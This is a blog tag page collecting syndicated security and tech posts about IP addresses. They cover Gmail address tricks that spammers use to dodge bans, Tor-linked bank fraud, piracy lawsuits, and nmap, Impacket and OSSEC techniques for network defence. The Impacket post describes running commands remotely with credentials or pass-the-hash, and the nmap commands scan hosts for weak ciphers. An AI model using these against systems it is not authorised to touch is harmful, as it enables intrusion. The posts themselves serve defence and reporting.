Posts tagged ‘ip address’

SANS Internet Storm Center, InfoCON: green: GMail quirk used to subvert website spam tracking, (Wed, Dec 10th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Yesterday while reviewing our logs here at the SANS Internet Storm Center I stumbled upon these:

login failed for
login failed for
login failed for
login failed for

The reason this caught my eye is because I recall reading that GMail ignores periods in email addresses. For example, if I register but then begin sending email to, it will arrive in my new inbox despite the additional periods.

Many blog and forum platforms have functionality for banning by email address. Spammers can use the periods in GMail addresses to subvert such banning controls by registering again without having to produce a truly new email address. Do your systems and/or websites allow for registering multiple accounts this way?
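One way for a site to defend against this trick is to normalize Gmail addresses before consulting its ban or duplicate-registration lists. A minimal sketch (the helper name is mine; the dot-ignoring and the googlemail.com alias are standard Gmail behavior):

```python
# Normalize a Gmail address so dotted variants map to one canonical
# key for ban/duplicate-registration checks. Gmail ignores periods in
# the local part and treats googlemail.com as an alias of gmail.com.
# The helper name is hypothetical.

def canonical_gmail(address: str) -> str:
    """Return a canonical form of an email address for ban lists."""
    local, _, domain = address.lower().partition("@")
    if domain in ("gmail.com", "googlemail.com"):
        local = local.replace(".", "")  # periods are ignored by Gmail
        domain = "gmail.com"
    return f"{local}@{domain}"
```

With this, j.o.h.n@gmail.com and jo.hn@gmail.com both collapse to john@gmail.com before the ban list is consulted, closing the re-registration loophole described above.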

Where this becomes more interesting is that these logs indicate visitors that tried to log in using these email addresses without having even attempted to register them first. None of the above logs come from a single IP address, though the first two do come from a single IP range. Is this due to a poorly programmed bot, or is it indicative of something else?

Let us know what you think in the comments!

Alex Stanford – GIAC GWEB GSEC,
Research Operations Manager,
SANS Internet Storm Center

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Microsoft Sues ‘Does’ For Activating Pirated Software

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Despite being one of the most pirated software vendors in the world, Microsoft doesn’t have a long track record of cracking down on individual pirates.

In fact, two months ago Microsoft CEO Satya Nadella noted that in some cases piracy can act as a conversion tool.

“We’ve always had freemium. Sometimes our freemium was called piracy,” Nadella said, adding that the usage first approach has its advantages.

This doesn’t mean that all pirates can have their way though. Microsoft does keep a close eye on the unauthorized use of its products with help from its in-house cybercrime center.

Late last week Microsoft filed a copyright infringement lawsuit against a person (or persons) who activated pirated copies of Windows 7 and Office 2010 from an AT&T Internet connection.

“Microsoft’s cyberforensics have identified a number of product key activations originating from IP address, which is presently assigned to ISP AT&T Internet Services…,” the complaint (pdf) reads.

“These activations have characteristics that on information and belief, establish that Defendants are using the IP address to activate pirated software.”

While many people believe that unauthorized copies are hard for Microsoft to detect, the company explains that its cybercrime team leverages state-of-the-art technology to detect software piracy.

The company describes its investigative approach as cyberforensics. Among other things, they look for activation patterns and characteristics which make it likely that certain IP-addresses are engaged in unauthorized copying.

“As part of its cyberforensic methods, Microsoft analyzes product key activation data voluntarily provided by users when they activate Microsoft software, including the IP address from which a given product key is activated,” the company writes.

According to the complaint, the defendant(s) in this case have activated numerous copies of Windows 7 and Office 2010 with suspicious keys. These keys were likely stolen from Microsoft’s supply chain, used without permission from the refurbisher channel, and used more often than the license permits.

Microsoft is now looking to identify the person or persons responsible for the copyright and trademark infringements, to recoup the damage they’ve suffered.

From the descriptions used in the complaint it seems likely that the target is not an average user, but someone who sells computers containing pirated software. Time will tell whether that’s indeed the case.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Treasury Dept: Tor a Big Source of Bank Fraud

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A new report from the U.S. Treasury Department found that a majority of bank account takeovers by cyberthieves over the past decade might have been thwarted had affected institutions known to look for and block transactions coming through Tor, a global communications network that helps users maintain anonymity by obfuscating their true location online.

The findings come in a non-public report obtained by KrebsOnSecurity that was produced by the Financial Crimes Enforcement Network (FinCEN), a Treasury Department bureau responsible for collecting and analyzing data about financial transactions to combat domestic and international money laundering, terrorist financing and other financial crimes.

In the report, released on Dec. 2, 2014, FinCEN said it examined some 6,048 suspicious activity reports (SARs) filed by banks between August 2011 and July 2014, searching the reports for those involving one of more than 6,000 known Tor network nodes. Investigators found 975 hits corresponding to reports totaling nearly $24 million in likely fraudulent activity.

“Analysis of these documents found that few filers were aware of the connection to Tor, that the bulk of these filings were related to cybercrime, and that Tor related filings were rapidly rising,” the report concluded. “Our BSA [Bank Secrecy Act] analysis of 6,048 IP addresses associated with the Tor darknet [link added] found that in the majority of the SAR filings, the underlying suspicious activity — most frequently account takeovers — might have been prevented if the filing institution had been aware that their network was being accessed via Tor IP addresses.”

Tables from the FinCEN report.


FinCEN said it was clear from the SAR filings that most financial institutions were unaware that the IP address where the suspected fraudulent activity occurred was in fact a Tor node.

“Our analysis of the type of suspicious activity indicates that a majority of the SARs were filed for account takeover or identity theft,” the report noted. “In addition, analysis of the SARs filed with the designation ‘Other’ revealed that most were filed for ‘Account Takeover,’ and at least five additional SARs were filed incorrectly and should have been ‘Account Takeover.’”

The government also notes that there has been a fairly recent and rapid rise in the number of SAR filings over the last year involving bank fraud tied to Tor nodes.

“From October 2007 to March 2013, filings increased by 50 percent,” the report observed. “During the most recent period — March 1, 2013 to July 11, 2014 — filings rose 100 percent.”

While banks may be able to detect and block more fraudulent transactions by paying closer attention to or outright barring traffic from Tor nodes, such an approach is unlikely to have a lasting impact on fraud, said Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley.

“I’m not surprised by this: Tor is easy for bad actors to use to isolate their identity,” Weaver said. “Yet blocking all Tor will do little good, because there are many other easy ways for attackers to hide their source address.”
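Whatever its limits, the screening FinCEN describes is cheap to implement: compare the source IPs of banking sessions against a published list of Tor node addresses. A minimal sketch (the one-IP-per-line file format and the plain list of login IPs are assumptions for illustration; Tor publishes node lists in several formats):

```python
# Flag logins that originate from known Tor nodes, using simple set
# membership against a downloaded node list (one IP per line).

def load_tor_nodes(path: str) -> set:
    """Load a set of Tor node IPs, one per line, skipping blanks."""
    with open(path) as f:
        return {line.strip() for line in f if line.strip()}

def flag_tor_logins(login_ips, tor_nodes) -> list:
    """Return the login source IPs that appear in the Tor node set."""
    return [ip for ip in login_ips if ip in tor_nodes]
```

A bank would feed this from its session logs; the FinCEN report suggests even this crude check would have caught most of the account takeovers in the SARs it examined.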

Earlier this summer, the folks who maintain the Tor Project identified this problem — that many sites and even ISPs are increasingly blocking Tor traffic because of its abuse by fraudsters — as an existential threat to the anonymity network. The organization used this trend as a rallying cry for Tor users to consider lending their brainpower to help the network thrive in spite of these threats.

“A growing number of websites treat users from anonymity services differently. Slashdot doesn’t let you post comments over Tor, Wikipedia won’t let you edit over Tor, and Google sometimes gives you a captcha when you try to search (depending on what other activity they’ve seen from that exit relay lately),” wrote Tor Project Leader Roger Dingledine. “Some sites like Yelp go further and refuse to even serve pages to Tor users.”

Dingledine continued:

“The result is that the Internet as we know it is siloing. Each website operator works by itself to figure out how to handle anonymous users, and generally neither side is happy with the solution. The problem isn’t limited to just Tor users, since these websites face basically the same issue with users from open proxies, users from AOL, users from Africa, etc.”

Weaver said the problem of high volumes of fraudulent activity coming through the Tor Network presents something of a no-win situation for any website dealing with Tor users.

“If you treat Tor as hostile, you cause collateral damage to real users, while the scum use many easy workarounds.  If you treat Tor as benign, the scum come flowing through,” Weaver said. “For some sites, such as Wikipedia, there is perhaps a middle ground. But for banks? That’s another story.”

SANS Internet Storm Center, InfoCON: green: Automating Incident data collection with Python, (Thu, Dec 4th)


One of my favorite Python modules is Impacket by the guys at Core Labs. Among other things it allows me to create Python scripts that can speak to Windows computers over SMB. I can use it to map network drives, kill processes on a remote machine and much more. During an incident, having the ability to reach out to all the machines in your environment to list or kill processes is very useful. Python and Impacket make this very easy. Check it out.

After installing Impacket, all of the awesome modules are available for use in your Python scripts. In addition to the modules, Impacket also includes several sample programs. Awesome tools like wmiexec.py give you functionality like Microsoft’s PSEXEC plus pass-the-hash in an easily automated format. Have you ever wished you could run wmic commands from Linux? Let’s use wmiexec.py to run a command on a remote Windows machine from Linux. You just provide the tool with a username, password, target IP address and a wmic command to run on the target machine.

WMIC from my Linux server is awesome, but the best part is that this is Python! So instead of running wmiexec.py from the command line, I can import it as a module and use it in a Python script. I’ll start out in the same directory as wmiexec.py and launch Python. Then I import wmiexec and create a variable to hold a WMIEXEC object. In this case I’ll create a variable called wmiobj that points to a WMIEXEC object. The first argument is the command I want to run. In this case I run a WMIC command that finds the path of the executable for every copy of a process with cmd somewhere in the process name. The only other arguments are the username, password and share=ADMIN$.

In this case one of the command prompts is running from a user’s temporary directory. That merits some additional investigation! With those 3 simple lines of Python code we were able to automate the query to a single host. Because it is Python we can easily use a for loop to run this on every workstation on our network, capture those results and compare them. Find the host with processes that aren’t running on any of the other hosts! Find the host with unique or unusual network connections! Then, if the conditions are right, automate something to isolate it.
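That for loop can be sketched in a few lines. This is a sketch, not Impacket’s documented API: the WMIEXEC constructor below follows the diary’s description (command first, then username, password, share="ADMIN$"), and the class’s exact signature varies between Impacket releases, so check the examples/wmiexec.py you have installed. The subnet and credentials are placeholders.

```python
# Sweep a /24 with the same WMIC query, one host at a time, using
# Impacket's sample wmiexec.py as an importable module.
import sys

def build_targets(prefix: str, start: int = 1, end: int = 254) -> list:
    """Expand a /24-style prefix like '10.0.0.' into host addresses."""
    return [f"{prefix}{i}" for i in range(start, end + 1)]

# The WMIC query from the diary: executable path of every process with
# cmd somewhere in its name.
QUERY = 'process where (name like "%cmd%") get ExecutablePath'

if __name__ == "__main__" and "--run" in sys.argv:
    import wmiexec  # Impacket's examples/wmiexec.py, from the same directory

    for ip in build_targets("10.0.0."):          # assumed subnet
        try:
            # Per the diary: command first, then username, password,
            # and share="ADMIN$". Check your Impacket release's signature.
            wmiobj = wmiexec.WMIEXEC(QUERY, "admin", "password", share="ADMIN$")
            wmiobj.run(ip)                       # prints WMIC output per host
        except Exception as err:                 # unreachable host, bad creds
            print(f"{ip}: {err}")
```

Collect each host’s output into a dict keyed by IP and the outlier comparison described above becomes a couple more lines of Python.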

Interested in learning more? Come check out SEC573 Python for Penetration Testers. You will learn Python starting from ground zero and learn how to automate all the things. Join me at CyberGuardian on March 2 or in Orlando on April 11.

Check out the courses here:

Mark Baggett



SANS Internet Storm Center, InfoCON: green: Flushing out the Crypto Rats – Finding “Bad Encryption” on your Network, (Mon, Dec 1st)


Just when folks get around to implementing SSL, we need to retire SSL! Not a week goes by that a client isn’t asking me about SSL (or more usually TLS) vulnerabilities or finding issues on their network.

In a recent case, my client had just finished a datacenter / PCI audit, and had one of his servers come up as using SSL 2.0, which of course has been deprecated since 1996 – the auditor’s recommendation was to update to SSL 3.0 (bad recommendation, keep reading on). This illustrates two problems:

1/ W-a-a-a-y too many assessments consist of scanning the target, and pasting the output of the scanning tool into the final report.

2/ In this case, the person writing the report had either not read the text they were pasting, or was not knowledgeable enough to understand that updating from SSL 2 to SSL 3 wasn’t going to get to a final good state. Shame on them either way!

As a side note, if the site (it was on an internal network remember) was running plain old HTTP, then the scanner would not have identified a problem, and the person behind the scanner would very likely have missed this completely! (OOPS)

Anyway, my client’s *real* question was how can we scan our network for vulnerable SSL versions and ciphers, but not pay big bucks for an enterprise scanning tool or a consultant?

My answer was (that day) – NMAP of course!

To check for weak or strong ciphers on a server or subnet, use the script ssl-enum-ciphers:

nmap -Pn -p443 --script=ssl-enum-ciphers <target>

Nmap scan report for
Host is up (0.097s latency).
rDNS record for
443/tcp open https
| ssl-enum-ciphers:
| SSLv3: No supported ciphers found
| TLSv1.0:
| ciphers:
| compressors:
| TLSv1.1:
| ciphers:
| compressors:
| TLSv1.2:
| ciphers:
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 – strong
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 – strong
| TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 – strong
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 – strong
| TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 – strong
| compressors:
|_

Nmap done: 1 IP address (1 host up) scanned in 34.63 seconds

You can scan specifically for SSLv2 devices using the script sslv2.nse:

nmap -Pn -p443 --open --script=sslv2.nse <target>

Nmap scan report for
Host is up (0.029s latency).
443/tcp open https
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
MAC Address: 00:E0:81:CE:9E:74 (Tyan Computer)

NMAP also has an ssl-heartbleed script (if you’re still focused on that), and an ssl-poodle script, but you’ll need to download that one from their script page – it’s not in the base installation.

While you’re at it, take a look at cipher support on any SSH enabled devices on your network – you are likely to be surprised at what you find. For instance, this is the management interface of my home firewall – I’m not thrilled with the 3des-cbc and MD5 support, but I guess that’s why there…

Nmap scan report for
Host is up (0.0020s latency).
22/tcp open ssh
| ssh2-enum-algos:
| kex_algorithms: (1)
| diffie-hellman-group1-sha1
| server_host_key_algorithms: (1)
| ssh-rsa
| encryption_algorithms: (4)
| aes128-cbc
| 3des-cbc
| aes192-cbc
| aes256-cbc
| mac_algorithms: (4)
| hmac-sha1
| hmac-sha1-96
| hmac-md5
| hmac-md5-96
| compression_algorithms: (1)
|_

Nmap done: 1 IP address (1 host up) scanned in 47.39 seconds

Or, for a real eye-opener, scan your subnet for SSHv1 enabled devices – note that this scan (and the previous one) assumes that your SSH service is on port 22. In a zero knowledge scan, you’d of course scan a wider range of ports (all of them if there…):

nmap -Pn -p22 --script=sshv1.nse <subnet>

This scan didnt find anything at my house, but it *always* finds stuff at client sites!

What crypto support issues have you found when you scanned for them? And how long do you think these problems were there? Please, share your story using our comment link!

Rob VandenBrink


Errata Security: The Pando Tor conspiracy troll

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Tor, also known as The Onion Router, bounces your traffic through several random Internet servers, thus hiding the source. It means you can surf a website without them knowing who you are. Your IP address may appear to be coming from Germany when in fact you live in San Francisco. When used correctly, it prevents eavesdropping by law enforcement, the NSA, and so on. It’s used by people wanting to hide their actions from prying eyes, from political dissidents, to CIA operatives, to child pornographers.

Recently, Pando (an Internet infotainment site) released a story accusing Tor of being some sort of government conspiracy.

This is nonsense, of course. Pando’s tell-all exposé of the conspiracy contains nothing that isn’t already widely known. We in the community have long joked about this. We often pretend there is a conspiracy in order to annoy uptight Tor activists like Jacob Appelbaum, but we know there isn’t any truth to it. This really annoys me — how can I troll about Tor’s government connections when Pando claims there’s actually truth to the conspiracy?

The military and government throws research money around with reckless abandon. That no more means they created Tor than it means they created the Internet back in the 1970s. A lot of that research is pure research, intended to help people. Not everything the military funds is designed to kill people.

There is no single “government”. We know, for example, that while some in government paid Jacob Appelbaum’s salary, others investigated him for his Wikileaks connections. Different groups are often working at cross purposes — even within a single department.

A lot of people have ties to the government, including working for the NSA. The NSA isn’t some secret police designed to spy on Americans, so a lot of former NSA employees aren’t people who want to bust privacy. Instead, most NSA employees are sincere in making the world a better place — which includes preventing evil governments from spying on dissidents. As Snowden himself says, the NSA is full of honest people doing good work for good reasons. (That they’ve overstepped their bounds is a problem — but that doesn’t mean they are the devil).

Tor is based on open code and math. It really doesn’t matter what conspiracy lies behind it, because we can see the code. It’s like BitCoin — we know there is a secret conspiracy behind it, with the secretive Satoshi Nakamoto owning a billion dollars worth of the coins. But that still doesn’t shake our faith in the code and the math.

Dissidents use Tor — successfully. We know that because the dissidents are still alive. Even if it’s a secret conspiracy by the U.S. government, it still does what its supporters want, helping dissidents fight oppressive regimes. In any case, Edward Snowden, who had access to NSA secrets, trusts his own life to Tor.

Tor doesn’t work by magic. I mention this because the Pando article lists lots of cases where Tor failed to protect people. The reasons were unlikely to have been flaws in Tor itself, but appear to have been other more natural causes. For example, the Silk Road server configuration proves it was open to the Internet as well as through Tor, a rookie mistake that revealed its location. The perfect concealment system can’t work if you sometimes ignore it. It’s like blaming the Pill for not preventing pregnancy because you took it only on some days but not others. Thus, for those of us who know technically how things work, none of the cases cited by Pando shake our trust in Tor.

I’m reasonably technical. I’ve read the Tor spec (though not the code). I play with things like hostile exit nodes. I fully know Tor’s history and ties to the government. I find nothing in the Pando article that is credible, and much that is laughable. I suppose I’m guilty of getting trolled by this guy, but seriously, Pando pretends not to be a bunch of trolls, so maybe this deserves a response.

SANS Internet Storm Center, InfoCON: green: Guest diary: Detecting Suspicious Devices On-The-Fly, (Tue, Nov 25th)


If you apply classic hardening rules (keep patch levels current, use an AV, enable the firewall and use them with due diligence), modern operating systems are more and more difficult to compromise today. Extra tools like EMET can also raise the bar. On the other hand, networks are more and more populated with unknown/personal devices or devices which provide multiple facilities like storage (NAS), printers (MFP), VoIP, IP cameras, …

Being easily compromised, they become a very good target from which to pivot into the network. They run out-of-the-box: just plug in the network/power cables and they are ready to go! A classic vulnerability management process will detect such devices, but you still risk missing them if you only run a monthly scan! To catch new devices on the fly and get an immediate idea of their attack surface (for example: is a backdoor present?), I’m using the following toolbox: Arpwatch, Nmap and OSSEC as the conductor.

Arpwatch is a tool for monitoring ARP traffic on a LAN. It can detect new MAC addresses or pairing changes (IP/MAC). Nmap is the best-known port scanner, and OSSEC is a log management tool with many features like a built-in HIDS.

A first piece of good news: Arpwatch log entries are processed by default by OSSEC, which has a great feature called Active-Response that allows you to trigger actions (read: execute scripts) under specific conditions. In our case, an Active-Response block ties the Arpwatch rules to a scan script.

The above configuration specifies that the script will be executed with the srcip argument (reported by Arpwatch) on agent 001 when rule 7201 or 7202 matches (i.e. when a new host or a MAC address change is detected). The script is based on the existing active-response scripts and spawns an Nmap scan:

nmap -sC -O -oG - -oN ${PWD}/../logs/${IP}.log ${IP} | grep "Ports:" >> ${PWD}/../logs/gnmap.log

This command will output interesting information in grepable format to the gnmap.log file: the open ports (if any) of the detected IP, as in the example below. One line per host will be generated:

Host: ( Ports: 22/open/tcp//ssh///, 80/open/tcp///,3306/open/tcp/// …
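The active-response wrapper around that command can be tiny. Here is a sketch in Python rather than shell (the ../logs paths mirror the diary’s layout and are assumptions): OSSEC calls it with the IP Arpwatch reported, the host gets scanned, and any grepable “Ports:” line is appended to gnmap.log for OSSEC to decode.

```python
# Minimal Python take on the active-response script described above.
import os
import subprocess
import sys

def ports_lines(grepable: str) -> list:
    """Keep only the 'Ports:' lines from nmap -oG (grepable) output."""
    return [line for line in grepable.splitlines() if "Ports:" in line]

def scan_new_host(ip: str, logdir: str) -> None:
    """Scan a newly detected host; append its open ports to gnmap.log."""
    result = subprocess.run(
        ["nmap", "-sC", "-O", "-oG", "-",
         "-oN", os.path.join(logdir, f"{ip}.log"), ip],
        capture_output=True, text=True, check=False,
    )
    with open(os.path.join(logdir, "gnmap.log"), "a") as log:
        for line in ports_lines(result.stdout):
            log.write(line + "\n")

if __name__ == "__main__" and len(sys.argv) > 1:
    scan_new_host(sys.argv[1], "../logs")   # srcip passed by OSSEC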

OSSEC is a wonderful tool and can decode this by default. Just configure the gnmap.log as a new events source:

And new alerts will be generated:

2014 Oct 27 17:54:23 (shiva)
Rule: 581 (level 8) – Host information added.
Host: (, open ports: 22(tcp) 80(tcp) 3306(tcp)

By using this technique, you will immediately detect new hosts connected to the network (or when an IP address is paired with a new MAC address) and you’ll get the list of services running on them as well as the detected operating system (if fingerprinting is successful). Happy hunting!

Xavier Mertens


Errata Security: That wraps it up for end-to-end

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

The defining feature of the Internet back in 1980 was “end-to-end”, the idea that all the intelligence was on the “ends” of the network, and not in middle. This feature is becoming increasingly obsolete.

This was a radical design at the time. Big corporations and big government still believed in the opposite model, with all the intelligence in big “mainframe” computers at the core of the network. Users would just interact with “dumb terminals” on the ends.

The reason the Internet was radical was the way it gave power to the users. Take video phones, for example. AT&T had been promising this since the 1960s, as the short segment in “2001 A Space Odyssey” showed. However, getting that feature to work meant replacing all the equipment inside the telephone network. Telephone switches would need to know the difference between a normal phone call and a video call. Moreover, there could be only one standard, world wide, so that calling Japan or Europe would work with their video telephone systems. Users were powerless to develop video calling on their own — they would have to wait for the big telecom monopolies to develop it, however long it took.

That changed with the Internet. The Internet carries packets without knowing their content. Video calling with Facetime or Skype or LINE is just an app, from your iPhone or Android or PC. People keep imagining new applications for the Internet every day, and implement them, without having to change anything in core Internet routing hardware.

I’ve used Facetime, Skype, and LINE to talk to people in Japan. That’s because there is no real international standard for video calling. Each person I call requires me to install whichever app they are using. Traditional thinking is that government ought to create standards, so that every app would be compatible with every other app, so that I could Skype from Windows to somebody’s iPhone using Facetime. This tradition is nonsense. If we waited for government standards, it’d take forever. Teenagers who heavily use video today would be grown up with kids of their own before government got around to creating the right standard. Lack of standards means freedom to innovate.

Such freedom was almost not the case. You may have heard of something called the “OSI 7 Layer Model”. Everything you know about that model is wrong. It was an attempt by Big Corporations and Big Government to enforce their model of core-centric networking. It demanded such things as a “connection oriented network protocol”, meaning smart routers rather than the dumb ones we have today. It demanded that applications be standardized, so that there would be only one video conferencing standard, for example. Governments in the US, Japan, and Europe mandated that the computers they bought support OSI-conformant protocols. (The Internet’s TCP/IP protocols do not conform to the OSI model.) Such rules were on the books into the late 1990s dot-com era, when many in government still believed that the TCP/IP Internet was just a brief experiment on the way to a Glorious Government OSI Internetwork.

The Internet did have standards, of course, but they were developed in the opposite manner. Individuals innovated first, on the ends of the network, developing apps. Only when such apps became popular did they finally get documented as a “standard”. In other words, Internet standards were more de facto than de jure. People innovated first, on their own ends of the network, and the infrastructure and standards caught up later.

But here’s the thing: the Internet ideal of end-to-end isn’t perfect, either. There are reasons why not all innovation happens on the ends.

Take your home network as an example. The way your home likely works is that you have a single home router with cable/fiber/DSL on one side talking to the Internet, and WiFi on the other side talking to the devices in your home. Attached to your router you have a desktop computer, a couple notebooks, an iPad, your phones, an Xbox/Playstation, and your TV.

In the true end-to-end model, all these devices would be on the Internet directly — that they could be “pinged” from the Internet. In today’s reality, though, that’s not the way things work. Your home router is a firewall. It blocks incoming connections, so that devices in your home can connect outwards, but nothing on the Internet can connect inwards. This fundamentally breaks the ideal of end-to-end, as a smart device sits in the network controlling access to the ends.

This is done for two reasons. The first is security, so that hackers can’t hack the devices in your home. Blocking inbound traffic blocks 99% of hacker attacks against devices.

The second reason for smart home routers is the well-known limitation on Internet addresses: there are only 4 billion of them. However, there are more than 4 billion devices connected to the Internet. To fix this, your home router does address translation. Your router has only a single public Internet address. All the devices in your home have private addresses that wouldn’t work on the Internet. As packets flow in/out of your home, your router transparently changes the private addresses in the packets into the single public address.

Thus, when you google “what’s my IP address“, you’ll get a different address than your local machine. Your machine will have a private address like 10.x.x.x or 192.168.x.x, but servers on the Internet won’t see that — they’ll see the public address you’ve been assigned by your ISP.
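The private ranges mentioned above are easy to test for programmatically; Python’s standard ipaddress module, for instance, knows the private blocks:

```python
# Check whether an address falls in private (non-routable) space, i.e.
# the kind of address that sits behind a home router's translator.
import ipaddress

def is_private(addr: str) -> bool:
    """True for private addresses like 10.x.x.x or 192.168.x.x."""
    return ipaddress.ip_address(addr).is_private

# is_private("192.168.1.10") -> True   (typical home LAN address)
# is_private("8.8.8.8")      -> False  (publicly routable)
```

Run it against your own machine’s address and against what “what’s my IP address” reports, and you will usually see the private/public split in action.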

According to Gartner, nearly a billion smartphones were sold in 2013. These are all on the Internet. That represents a quarter of the Internet address space used up in only a single year. Yet, virtually none of them are assigned real Internet addresses. Almost all of them are behind address translators — not the small devices like you have in your home, but massive translators that can handle millions of simultaneous devices.

The consequence is this: there are more devices with private addresses, that must go through translators, than there are devices with public addresses. In other words, less than 50% of the Internet is end-to-end.

The “address space exhaustion” of traditional Internet addresses inspired an update to the protocol to use larger addresses, known as IPv6. It uses 128-bit addresses, or 4 billion times 4 billion times 4 billion times 4 billion. This is enough to assign a unique address to all the grains of sand on all the beaches on Earth. It’s enough to restore end-to-end access to every device on the Internet, times billions and billions.

My one conversation with Vint Cerf (one of the key Internet creators) was over this address space issue. Back in 1992, every Internet engineer knew for certain that the Internet would run out of addresses by around the year 2000. Every engineer knew this would cause the Internet to collapse. At the IETF meeting, I tried to argue otherwise. I used the Simon-Ehrlich Wager as an analogy. Namely, the 4 billion addresses weren’t a fixed resource, because we would become increasingly efficient at using them. For example, “dynamic” addresses would use space more efficiently, and translation would reuse addresses.

Cerf’s response was the tautology “but that would break the end-to-end principle”.

Well, yes, but no such principle should be a straightjacket. The end-to-end principle is already broken by hackers. Even with IPv6, when all your home devices have a public rather than private address on the Internet, you still want a firewall breaking the end-to-end principle blocking inbound connections. Once you’ve decided to firewall a network, it no longer matters whether it’s using IPv6 or address translation of private addresses. Indeed, address translation is better for firewalling, as it defaults to “fail close”. That means if a failure occurs, all communication is blocked. With IPv6, firewalls become “fail open”, where failures allow communication to continue.

Firewalls are only the start in breaking end-to-end. It’s the “cloud” where we see a radical reversion back to old principles.

Your phone is no longer a true “end” of the network. Sure, your phone has a powerful processor that’s faster than supercomputers of the last decade, but that power is used primarily for display, not for computation. Your data and computation are instead done in the cloud. Indeed, when you lose or destroy your phone, you simply buy a new one and “restore” it from the cloud.

Thus, we are right back to the old world of smart core network with “mainframes”, and “dumb terminals” on the ends. That your phone has supercomputer power doesn’t matter — it still does just what it’s told by the cloud.

But the last nail in the coffin to the “end-to-end” principle is the idea of “net neutrality”. While many claim it’s a technical concept, it’s just a meaningless political slogan. Congestion is an inherent problem of the Internet, and no matter how objectively you try to solve it, it’ll end up adversely affecting somebody — somebody who will then lobby politicians to rule in their favor. The Comcast-NetFlix issue is a good example where the true technical details are at odds with the way this congestion issue has been politicized. Things like “fast-lanes” are everywhere, from content-delivery-networks to channelized cable/fiber. Rhetoric creates political distinctions among various “fast-lanes” when there are no technical distinctions.

This politicization of the Internet ends the personal control over the Internet that was promised by end-to-end. Instead of being able to act first and ask for forgiveness later, you must first wait for permission from Big Government. Instead of being able to create your own services, you must wait for Big Corporations (the only ones that can afford lawyers to lobby government) to deliver those services to you.


We aren’t going to regress completely to the days of mainframes, of course, but we’ve given up much of the territory of individualistic computing. In some ways, this is a good thing. I don’t want to manage my own data, losing it when a hard drive crashes because I forgot to back it up. In other ways, it’s a bad thing. The more we regulate the Internet to ensure good things, the more we stop innovations that don’t fit within our preconceived notions. Worse, the more it’s regulated, the more companies have to invest in lobbying the government for favorable regulation, rather than developing new technology.

TorrentFreak: If Illegal Sites Get Blocked Accidentally, Hard Luck Says Court

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

blockedThe movie and music industries have obtained several High Court orders which compel UK ISPs to block dozens of websites said to facilitate access to copyright-infringing content. Recently, however, they have been joined by those seeking blockades on trademark grounds.

The lead case on this front was initiated by Cartier and Mont Blanc owner Richemont. The company successfully argued that several sites were infringing on its trademarks and should be blocked by the UK’s leading ISPs.

The case is important not only to trademark owners but also to those operating in the file-sharing arena since the High Court is using developments in one set of cases to determine the outcome of legal argument in the other.

The latest ruling concerns potential over-blocking. In some cases target sites move to IP addresses that are shared with other sites that are not covered by an injunction. As a result, these third-party sites would become blocked if ISPs filter their IP addresses as ordered by the Court.

To tackle this problem Richemont put forward a set of proposals to the Court. The company suggested that it could take a number of actions to minimize the problem including writing to the third-party sites informing them that a court order is in force and warning them that their domains could become blocked. The third party sites could also be advised to move to a new IP address.

Complicating the issue is the question of legality. While third-party sites aren’t mentioned in blocking orders, Richemont views some of them as operating unlawfully. When the company’s proposals are taken as a package and sites are operating illegally, Richemont believes ISPs should not be concerned over “collateral damage.”

Counsel for the ISPs disagreed, however, arguing that the Court had no jurisdiction to grant such an order. Mr Justice Arnold rejected that notion and supported Richemont’s efforts to minimize over-blocking in certain circumstances.

“The purpose of Richemont’s proposal is to ensure that the [blocking] order is properly targeted, and in particular to ensure that it is as effective as possible while avoiding what counsel for Richemont described as ‘collateral damage’ to other lawful website operators which share the same IP address,” the Judge wrote.

“If the websites are not engaged in lawful activity, then the Court need not be concerned about any collateral damage which their operators may suffer. It is immaterial whether the Court would have jurisdiction, or, if it had jurisdiction, would exercise it, to make an order requiring the ISPs to block access to the other websites.”

The ISPs further argued that the Court’s jurisdiction to adopt Richemont’s proposals should be limited to sites acting illegally in an intellectual property rights sense. The argument was rejected by the Court.

Also of note was the argument put forward by the ISPs that it is the Court’s position, not anyone else’s, to determine if a third-party site is acting illegally or not. Justice Arnold said he had sympathy with the submission, but rejected it anyway.

“As counsel for Richemont submitted, the evidence shows that, in at least some cases, it is perfectly obvious that a particular website which shares an IP address with a Target Website is engaged in unlawful activity. Where there is no real doubt about the matter, the Court should not be required to rule,” the Judge wrote.

“Secondly, and perhaps more importantly, Richemont’s proposal gives the operators of the affected websites the chance either to move to an alternative server or to object before the IP address is blocked. If they do object, the IP address will not be blocked without a determination by the Court.”

In summary, any third-party site blocked because it shares an IP address with a site featured in a blocking order will get no sympathy from the High Court if, at Richemont’s discretion, it is deemed to be acting illegally. The fact that such sites are not mentioned in an order will not save them, but they will have a chance to object before being blocked by UK ISPs.

“This action is about protecting Richemont’s Maisons and its customers from the sale of counterfeit goods online through the most efficient means, it is not about restricting freedom of speech or legitimate activity,” the company previously told TF.

“When assessing a site for blocking, the Court will consider whether the order is proportionate – ISP blocking will therefore only be used to prevent trade mark infringement where the Court is satisfied that it is appropriate to do so.”

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Liam Neeson Downloaders Face Anti-Piracy Shakedown

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

File-sharers in the United States, Germany and the UK are particularly familiar with the tactics of so-called copyright trolls. In recent years the lucrative nature of the business has attracted many companies, all out to turn piracy into profit.

